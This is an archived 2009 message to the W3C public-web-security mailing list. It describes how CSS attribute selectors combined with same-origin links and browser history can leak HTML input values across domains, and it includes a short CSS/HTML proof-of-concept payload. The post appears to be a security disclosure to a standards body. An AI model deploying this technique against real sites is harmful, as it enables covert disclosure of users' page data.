Same origin CSS selector attacks from gaz Heyes on 2009-12-10 (public-web-security@w3.org from December 2009)

From: gaz Heyes <gazheyes@gmail.com>
Date: Thu, 10 Dec 2009 09:27:37 +0000
To: public-web-security@w3.org
Message-ID: <252dd75b0912100127u5de51e6ob711a8e7b7dfd99e@mail.gmail.com>

Hi All

Another attack vector not discussed is to use same origin urls to gather
data of HTML values. If you can use a reference to a url on the same site
and influence part of it's value then you can use that data.
So lets say a site allows selectors, display and a normal <a href> (same
origin) link

Then you can do:-
<style>
a {
    display:none;
}
input[value*="ab1"] + a {
    display:block;
}
input[value*="cd1"] + a + a {
    display:block;
}
input[value*="ef1"] + a + a + a{
    display:block;
}
</style>

<input value="cd1xxx" />

<a href="#ab1">ab1</a>

<a href="#cd1">cd1</a>

<a href="#ef1">ef1</a>

This data can be gathered from any site at any point as long as the history
hasn't been cleared. This obviously isn't going to work for bruteforcing
tokens but could be used for simple information disclosure across domains.

Received on Thursday, 10 December 2009 09:28:18 UTC